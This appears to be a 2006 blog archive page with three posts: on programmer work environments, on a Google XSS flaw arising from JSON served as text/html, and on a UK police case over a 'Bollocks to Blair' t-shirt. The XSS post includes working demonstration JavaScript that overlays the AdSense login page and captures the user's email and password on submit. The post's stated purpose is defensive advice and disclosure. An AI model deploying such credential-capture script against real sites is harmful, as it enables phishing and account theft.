Archive for July, 2006

Programming flow, and why what works for you, doesn’t work for Mildred

Sunday, July 30th, 2006

The Joel production line appears to be claiming that for every programmer can only work one way, that way being in private, with no distractions, and just churning away at a task.

It appears that Joel feels programmers has no artistic parts where inspiration might be needed, he also appears to believe that every programmer has zen like orders of concentration such that they can endlessly code without a single distraction.

Now it’s common that many programmers don’t like interuptions, but not all, I’ve met a few others, generally the best ones I’m working with - perhaps that’s because I reckonise their quality because I interact more with them, or because it is related to a mind that perserveres in an enviroment where most people are not like you are the better programmers - I don’t know. I could never work in a private office, I can work in a pub, or a cafe, or on the sofa with a TV for company and the distraction, but I cannot work in a private office, or a silent open-plan office.

What happens is there aren’t the distractions to trigger inspiration, or to slow down the thought so the code actually written is the code that is in the head. Of course even without noise, the refresh email, refresh usenet, visit bloglines, check the lurking on IRC channels can be used as a distraction - but even with those, I often have to turn to spider solitaire to give the brain a break to solve the particular problem. Of course it may be even more productive to go for a jog, or a walk on the beach, but those aren’t things you can do if you’re having to work in an office - all you can do is walk to the coffee or around the office - if the office is all private rooms you can’t even do that, as you’ll never meet anyone.

Don’t make the mistake of assuming what works for you, will work for everyone, people are very different creatures! One of the big problems I have in a closed enviroment is the length of time it takes to get to know people, can I call that bloke on the team a muppet when he mistakes, or do I have to tread on eggshells around him, can I throw out an idea without people thinking me stupid and not listening next time - everyone will always have stupid ideas, but if they don’t say them they might never say their good ones. I need to get to know the team, both them, and what they’re doing, and how they write code - are they someone who checks in regularly - so there’s no point reporting that bug to them, they’ll know about it just wanted it checked in - or are they someone who checks in only when they think it’s finished so the bug needs reporting.

Writing software, or creating websites is a team activity, if everyone’s in a seperate office where’s the team? Of course teams can work remotely, there’s no need everyone be in the same office - however they then do need an IRC channel or group chat where everyone can overhear the other conversations - and have off topic conversations, otherwise the social interaction never builds up, and you can never learn to trust the other people.

Don’t serve JSON as text/html

Wednesday, July 5th, 2006

Another day, another XSS flaw, this one in Google again, but this is a little more interesting than the normal ones, what this one shows is how JSON results add an extra vector to attack that might be missed by your QA team.

The problem here was that the JSON was returned with a mime-type of text/html, a browser will render that as if it was an HTML page, even if it’s really just a javascript snippet. The easiest way to protect against these is to ensure that all javascript recieved by the XMLHTTPRequest object is returned with a suitable mime-type - application/json That will mean even when you make a mistake and write un-encoded untrusted data to the document, it won’t allow people to attack your site.

The google exploit was reported here, it’s at the time of writing unpatched, unfortunately that was down to the discoverer not giving google any time to fix, whilst they have had their problems before, recently they have patched quickly, so this was not very fair, or wise. Google also appear to be taking testing their own services for security flaws more seriously, they recently had a presentation to the QA team that you can watch on Google Video.

As I’ve said before, the everything on a single domain causes problems, it means any exploit anywhere on the domain, allows you to exploit any service provided for the domain. This exploit is also present in https:// google, so to re-enforce the problem XSS can present to a user, and why XSS is not simply about cookie stealing. Here’s a simple demonstration of using the exploit to steal username and password from google adsense.

The exploit is simply used to create an IFRAME that fills the document and points it to a google adsense login, when the user logs in, the username and password are alerted - also after logging in, then the “today’s earnings” are alerted. Of course a real attacker would not alert these fields, but would sent them off to a site to be collected later. Are google adsense passwords useful? Would you notice if the address or account to get the cash changed until you’d not got the cheque?

The script code is simple, you don’t need to be clever, and phishers generally aren’t stupid, it takes brains to launder money.

document.body.innerHTML="<div><iframe src='https://www.google.com/adsense/report/overview'"+
" onload='go()' style='position:absolute;top:0;left:0;height:100%;width:100%;'></div>";

function go() {
  try {
  var win=window.frames[0];
  win.document.body.style.overflow="hidden";
  win.document.body.style.border="0px solid white";
  var doc=win.frames[0].document.forms[0];
  doc.onsubmit=function() {
   alert("Your adsense username and password are:n"+
   doc["Email"].value+'nandn'+doc["Passwd"].value);
   x=window.open(location.href);
  }
 } catch (e) {
  try {
   var win=window.frames[0];
   var doc=win.document.body;
   var x="Today's Earnings:"+doc.getElementsByTagName('h1')[0];
   alert(x.getElementsByTagName('span')[0].innerHTML.replace(" ",""));
  } catch (e) {}
 }
}

The result is clear:

Bollocks To Blair

Saturday, July 1st, 2006

Bollocks is a lovely word, flexible and not offensive at all to the majority of the British public, yet the Norfolk police think it causes “harassment, alarm and distress” if you use it as “Bollocks to Blair”. It seems to me that’s pretty clear that the Norfolk police don’t understand the law, the harassment, alarm and distress law that is punishable by an 80 pound fixed penalty notice, is the Section 5 public order act of 1986. The person is guilty of this offence if:

  • (b) displays any writing, sign or other visible representation which is threatening, abusive or insulting,

Now, I suppose that you could at a push say it was insulting, but I think it would be a struggle, it’s certainly not threatening or abusive, so I’m not sure it’s an offence at all however, if it is htere are two obvious defences applicable to the words “bollocks to blair” on a t-shirt,

  • (a) that he had no reason to believe that there was any person within hearing or sight who was likely to be caused harassment, alarm or distress, or
  • (c) that his conduct was reasonable.
  • (4) A person is guilty of an offence under section 5 only if he intends his words or behaviour, or the writing, sign or other visible representation, to be threatening, abusive or insulting, or is aware that it may be threatening, abusive or insulting or (as the case may be) he intends his behaviour to be or is aware that it may be disorderly.

Unfortunately this will never make it to court, when Tony Wright requests a court hearing, as is his right under the scheme then “the case will be reviewed by a Crown Prosecutor, applying the evidential and public interest test under the Code for Crown Prosecutors.” [PND Op guidence], and unfortunately I’m sure they’ll decide it’s not in the public interest.

We need a court case, the police are wasting too much time on ludicrous things, making simple mistakes, it’s possible to understand if not quite excuse the police making mistake when under real pressure and shooting innocent men, at least there was pressure, but what pressure is there on a policeman sitting in a Norfolk field faced with t-shirts saying “Bollocks to Blair”?

Bollocks has an interesting history in UK courts, in 1977 there was a case against against a record store and Richard Branson the Sex Pistols album http://en.wikipedia.org/wiki/Never_Mind_The_Bollocks_Here’s_The_Sex_Pistols, that case failed, probably thanks to the defence having a famous QC and Rumpole creator John Mortimer QC to help in the defence of a minor crime at a magistrates court.

Mr. Mortimer managed to sum up in that case saying the excellent

“What sort of country are we living in if a politician comes to Nottingham and speaks here to a group of people in the city centre and during his speech a heckler replies ‘bollocks’. Are we to expect this person to be incarcerated, or do we live in a country where we are proud of our Anglo Saxon language?”

[ref].

Unfortunately it’s looking increasingly like the Police do what such people to be incarcerated, and this time what famous QC’s are there that Mr Wright could call on, unfortunately I could only think of one, Cherie Booth QC, and I’m not sure she’d be up for it.